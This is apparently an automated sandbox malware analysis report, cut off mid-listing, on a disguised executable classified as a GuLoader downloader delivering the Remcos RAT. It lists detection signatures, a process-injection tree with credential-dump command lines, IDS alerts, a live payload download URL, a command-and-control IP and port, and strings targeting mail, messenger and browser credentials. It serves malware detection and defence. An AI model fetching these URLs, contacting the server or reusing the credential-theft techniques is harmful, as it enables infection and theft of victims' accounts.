Windows Analysis Report
DHRI_kurumsal kimlik rehberi-2023.exe

Overview

General Information

Sample Name:DHRI_kurumsal kimlik rehberi-2023.exe
Analysis ID:1334254
MD5:f6cbf303899397b7d28e19930d48627d
SHA1:c3b2d0902bc0724228519030d341294db265f379
SHA256:2eb8015d95b1f69eca4acc3d64c0ed58125431a19df865a493990025ebe5b40a
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to steal Mail credentials (via file registry)
Contains functionality to modify clipboard data
Yara detected WebBrowserPassView password recovery tool
Uses dynamic DNS services
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • DHRI_kurumsal kimlik rehberi-2023.exe (PID: 4520 cmdline: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe MD5: F6CBF303899397B7D28E19930D48627D)
    • wab.exe (PID: 7060 cmdline: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 7700 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugr MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 2268 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugr MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 4072 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcjtaqqgzarzmhukyhhkxsdkut MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 6412 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\repdaaihvijewviohscmifybdhowx MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
Source | Rule | Description | Author
C:\Users\user\AppData\Roaming\paqlgkfs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author
00000004.00000002.35514010061.0000000000821000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security
00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000004.00000002.35514571711.000000000565D000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: DHRI_kurumsal kimlik rehberi-2023.exe PID: 4520 | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security
              No Sigma rule has matched
              Timestamp:10/30/23-14:17:52.394655
              Source IP:192.168.11.20
              Destination IP:94.156.6.253
              SID:2032776
              Source Port:50094
              Destination Port:2402
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:10/30/23-14:17:49.596833
              Source IP:192.168.11.20
              Destination IP:217.147.225.69
              SID:2855192
              Source Port:50093
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:10/30/23-14:20:09.593886
              Source IP:94.156.6.253
              Destination IP:192.168.11.20
              SID:2032777
              Source Port:2402
              Destination Port:50094
              Protocol:TCP
              Classtype:A Network Trojan was detected

              AV Detection

              Source: DHRI_kurumsal kimlik rehberi-2023.exe | ReversingLabs: Detection: 78%
              Source: Yara match | File source: 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 7060, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: DHRI_kurumsal kimlik rehberi-2023.exe | Avira: detected
              Source: http://gudanidevelopment.ge/IogvoayYhe139.bin | Avira URL Cloud: Label: malware
              Source: http://gudanidevelopment.ge/IogvoayYhe139.binSkorFiltathirchimie.com/IogvoayYhe139.bin | Avira URL Cloud: Label: malware
              Source: C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exe | Avira: detection malicious, Label: HEUR/AGEN.1338455
              Source: C:\Users\user\AppData\Local\Temp\Atriocoelomic\Retarded.exe | ReversingLabs: Detection: 78%
              Source: DHRI_kurumsal kimlik rehberi-2023.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: DHRI_kurumsal kimlik rehberi-2023.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe | Code function: 4_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004059CC
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe | Code function: 4_2_004065FD FindFirstFileW,FindClose,4_2_004065FD
              Source: C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe | Code function: 4_2_00402868 FindFirstFileW,4_2_00402868
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_374D10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_374D10F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_374D6580 FindFirstFileExA,7_2_374D6580
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407C87
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898

              Networking

              Source: Traffic | Snort IDS: 2855192 ETPRO TROJAN GuLoader Encoded Binary Request M2 192.168.11.20:50093 -> 217.147.225.69:80
              Source: Traffic | Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.11.20:50094 -> 94.156.6.253:2402
              Source: Traffic | Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 94.156.6.253:2402 -> 192.168.11.20:50094
              Source: unknown | DNS query: name: ourt2949aslumes9.duckdns.org
              Source: Joe Sandbox View | ASN Name: NET1-ASBG NET1-ASBG
              Source: Joe Sandbox View | ASN Name: GRENA-ASTbilisiGeorgiaGE GRENA-ASTbilisiGeorgiaGE
              Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
              Source: Joe Sandbox View | IP Address: 94.156.6.253 94.156.6.253
              Source: Joe Sandbox View | IP Address: 178.237.33.50 178.237.33.50
              Source: global traffic | HTTP traffic detected: GET /IogvoayYhe139.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: gudanidevelopment.ge | Cache-Control: no-cache
              Source: global traffic | TCP traffic: 192.168.11.20:50094 -> 94.156.6.253:2402
              Source: unknown | TCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: wab.exe, 00000007.00000002.37758609179.00000000374A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000002.35582331725.0000000004674000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580330134.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580784486.0000000004674000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000002.35582331725.0000000004674000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580330134.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580784486.0000000004674000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 00000007.00000002.37758445453.0000000037410000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000007.00000002.37758445453.0000000037410000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: wab.exe, 00000007.00000003.36577115530.0000000006B02000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745429732.0000000006B03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: wab.exe, 00000007.00000003.36577115530.0000000006B02000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745505722.0000000006B2A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745429732.0000000006B03000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp_f
              Source: wab.exe, 00000007.00000002.37746447305.0000000006D20000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gudanidevelopment.ge/IogvoayYhe139.bin
              Source: wab.exe, 00000007.00000002.37746447305.0000000006D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gudanidevelopment.ge/IogvoayYhe139.binSkorFiltathirchimie.com/IogvoayYhe139.bin
              Source: DHRI_kurumsal kimlik rehberi-2023.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: wab.exe, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.35550707145.00000000037DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 0000000C.00000002.35549985519.0000000002DAC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/8r
              Source: wab.exe, 0000000C.00000002.35550707145.00000000037DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: wab.exe, 00000007.00000002.37758609179.00000000374A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 00000007.00000002.37758609179.00000000374A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 0000000A.00000002.35581482185.0000000000336000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.double
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doublecli
              Source: wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activ
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activi
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575493602.000000000468A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35576455750.000000000468A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575056619.0000000004689000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35576603084.000000000468A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
              Source: wab.exe, 0000000A.00000003.35571324117.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573483184.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571517195.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571582284.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571702365.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571387430.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571824908.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571642671.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571761891.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571888637.0000000004D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
              Source: bhvBEC4.tmp.10.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.med
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.medi
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/check
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checks
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
              Source: bhvBEC4.tmp.10.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lif
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lift.com/sync
              Source: wab.exe, 0000000A.00000003.35569834685.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lift.com/sync?
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get.a
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe.co
              Source: wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagea
              Source: wab.exe, 0000000A.00000003.35571449811.0000000004D99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
              Source: wab.exe, 0000000A.00000003.35572447017.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571517195.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571582284.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571702365.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572343715.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571387430.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572565404.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572407435.000000000467D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572627710.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571824908.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580330134.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580384165.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571642671.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571761891.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571888637.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572694606.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572506007.0000000004D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ib.adnxs.com/async_usersync_file
              Source: wab.exe, 0000000A.00000002.35581482185.0000000000336000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.35581482185.0000000000332000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.35582603347.0000000004DAD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.35582481202.0000000004688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
              Source: wab.exe, 0000000A.00000002.35582481202.0000000004688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsign
              Source: wab.exe, 0000000A.00000003.35571324117.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572447017.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571517195.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571582284.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580486755.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580435804.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35569834685.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571702365.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571135364.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572343715.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571387430.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572565404.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571010327.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580683985.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572627710.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35570898773.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580784486.000000000466F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 